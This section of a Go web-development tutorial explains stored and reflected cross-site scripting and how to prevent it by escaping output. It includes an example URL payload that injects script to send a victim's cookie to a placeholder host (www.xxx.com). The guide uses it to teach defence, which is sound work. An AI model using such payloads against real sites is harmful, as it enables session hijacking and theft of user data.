9.3 XSS attacks
With the development of Internet technology, web applications are often packed with dynamic content to improve user experience. Dynamic content is content that reacts and changes according to user requests and actions. Dynamic sites are often susceptible to cross-site scripting attacks (often referred to by security experts in its abbreviated form, XSS), something which static websites are completely unaffected by.
What is XSS?
As mentioned, the term XSS is an acronym for Cross-Site Scripting, which is a type of attack common on the web. In order not to confuse it with another common web acronym, CSS (Cascading Style Sheets), we use an X
instead of a C
for the cross in cross-site scripting. XSS is a common web security vulnerability which allows attackers to inject malicious code into webpages. Unlike most types of attacks which generally involve only an attacker and a victim, XSS involves three parties: an attacker, a client and a web application. The goal of an XSS attack is to steal cookies stored on clients by web applications for the purpose of reading sensitive client information. Once an attacker gets ahold of this information, they can impersonate users and interact with websites without their knowledge or approval.
XSS attacks can usually be divided into two categories: one is a stored XSS attack. This form of attack arises when users are allowed to input data onto a public page, which after being saved by the server, will be returned (unescaped) to other users that happen to be browsing it. Some examples of the types of pages that are often affected include comments, reviews, blog posts and message boards. The process often goes like this: an attacker enters some html followed by a hidden <script>
tag containing some malicious code, then hits save. The web application saves this to the database. When another user requests this page, the application queries this tainted data from the database and serves the page to the user. The attacker’s script then executes arbitrary code on the client’s computer.
The other type is a reflected XSS attack. The main idea is to embed a malicious script directly into the query parameters of a URL address. A server that immediately parses this data into a page of results and returns it (to the client who made the request) unsanitized, can unwittingly cause the client’s computer to execute this code. An attacker can send a user a legitimate looking link to a trusted website with the encoded payload; clicking on this link can cause the user’s browser to execute the malicious script.
XSS present the main means and ends as follows:
- Theft of cookies, access to sensitive information.
- The use of embedded Flash, through crossdomain permissions, can also be used by an attacker to obtain higher user privileges. This also applies for other similar attack vectors such as Java and VBScript.
- The use of iframes, frames, XMLHttpRequests, etc., can allow an attacker to assume the identity of a user to perform administrative actions such as micro-blogging, adding friends, sending private messages, and other routine operations. A while ago, the Sina microblogging platform suffered from this type of XSS vulnerability.
- When many users visit a page affected by an XSS attack, the effect on some smaller sites can be comparable to that of a DDoS attack.
XSS principles
Web applications that return requested data to users without first inspecting and filtering it can allow malicious users to inject scripts (typically embedded inside HTML within <script>
tags) onto other users’ browsers. When this malicious code is rendered on a user’s browser without first having been escaped from, the user’s browser will interpret this code: this is the definition of an XSS attack, and this type of mistake is the leading cause of XSS vulnerabilities.
Let’s go through the process of a reflective XSS attack. Let’s say there’s a website that outputs a user’s name according to the URL query parameters; access the following URL http://127.0.0.1/?name=astaxie
will cause the server to output the following:
hello astaxie
Let’s say we pass the following parameter instead, accessing the same url: http://127.0.0.1/?name=<script>alert('astaxie,xss')</script>
. If this causes the browser to produce an alert pop-up box, we can confirm that the site is vulnerable to XSS attacks. So how do malicious users steal cookies using the same type of attack?
Just like before, we have a URL:
http://127.0.0.1/?name=<script>document.location.href='http://www.xxx.com/cookie?'+document.cookie</script>
By clicking on this URL, you’d be sending the current cookie to the specified site: www.xxx.com
. You might be wondering, why would anybody click on such a strange looking URL in the first place? While it’s true that this kind of URL will make most people skeptical, if an attacker were to use one of the many popular URL shortening services to obscure it, would you still be able to see it? Most attackers would obfuscate the URL in one way or another, and you’d only know the legitimacy of the link after clicking on it. However by this point, cookie data will have already been sent to the 3rd party website, compromising your sensitive information. You can use tools like Websleuth to audit the security of your web applications for these types of vulnerabilities.
For a more detailed analysis on an XSS attack, have a look at the article: “[ Sina microblogging XSS event analysis ] (http://www.rising.com.cn/newsletter/news/2011-08-18/9621.html)”
How to prevent XSS
The answer is simple: never trust user input, and always filter out all special characters in any input data you may receive. This will eliminate the majority of XSS attacks.
Use the following techniques to defend against XSS attacks:
- Filter special characters
One way to avoid XSS is to filter user-supplied content. The Go language provides some HTML filtering functions in its text/template
packge such as HTMLEscapeString
and JSEscapeString
, to name a few.
- Specify the content type in your HTTP headers
w.Header().Set("Content-Type","text/javascript")
This allows client browsers to parse the response as javascript code (applying the neccessary filters) instead of rendering the content in an unspecified and potentially dangerous manner.
Summary
Introducing XSS vulnerabilities is a very real hazard when developing web applications. It is important to remember to filter all data, especially before outputting it to clients; this is now a well-established means of preventing XSS.
Links
- Previous section: Filter inputs
- Next section: SQL injection